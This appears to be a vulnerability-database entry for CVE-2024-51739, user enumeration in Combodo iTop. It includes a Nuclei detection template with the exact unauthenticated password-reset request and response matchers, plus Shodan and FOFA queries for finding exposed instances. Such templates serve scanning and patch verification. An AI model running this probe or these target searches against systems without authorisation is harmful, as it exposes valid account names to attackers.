| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2024-51739 | 5 Nov 202418:13 | – | circl | |
| Combodo iTop 信息泄露漏洞 | 5 Nov 202400:00 | – | cnnvd | |
| CVE-2024-51739 | 5 Nov 202418:11 | – | cve | |
| CVE-2024-51739 Users enumeration allowed through Rest API in Combodo iTop | 5 Nov 202418:11 | – | cvelist | |
| CVE-2024-51739 | 5 Nov 202418:15 | – | nvd | |
| CVE-2024-51739 Users enumeration allowed through Rest API in Combodo iTop | 5 Nov 202418:11 | – | osv | |
| PT-2024-24926 · Comodo +1 · Itop +1 | 4 Nov 202400:00 | – | ptsecurity | |
| PT-2024-34874 · Comodo +1 · Itop +1 | 5 Nov 202400:00 | – | ptsecurity | |
| CVE-2024-51739 | 5 Feb 202503:20 | – | redhatcve | |
| CVE-2024-51739 Users enumeration allowed through Rest API in Combodo iTop | 5 Nov 202418:11 | – | vulnrichment |
id: CVE-2024-51739
info:
name: iTop - User Enumeration via REST Endpoint
author: DhiyaneshDk
severity: medium
description: |
From the webservices/rest.php file, several operations are accessible from an unauthenticated user. One of them is `do_reset_pwd`, allowing to reset a user password. This feature can be abused to perform user enumeration when a non-existent user is provided.
impact: |
Attackers can exploit this vulnerability to compromise system security.
remediation: |
Apply security patches to address CVE-2024-51739.
reference:
- https://www.synacktiv.com/en/advisories/multiple-vulnerabilities-on-itop
- https://github.com/Combodo/iTop/security/advisories/GHSA-2hmf-p27w-phf9
- https://nvd.nist.gov/vuln/detail/CVE-2024-51739
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-51739
cwe-id: CWE-200
epss-score: 0.01259
epss-percentile: 0.66045
cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: combodo
product: itop
shodan-query: http.html:" itop login"
fofa-query: body=" itop login"
tags: cve,cve2024,itop,enum,unauth,vuln
http:
- method: GET
path:
- "{{BaseURL}}/webservices/rest.php?loginop=do_reset_pwd&auth_user=doesnotexist"
matchers:
- type: word
part: body
words:
- "<h1>Reset password</h1>"
- "'doesnotexist' is not a valid login"
condition: and
# digest: 4a0a0047304502207d2e4a629c9407cadd3f189a65dda2f49589173a5a8cee39565417cdaf87b61b022100a969f717638d5f2855df267742160c227386c3d9b68a75ad686e4f110aaf8abd:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation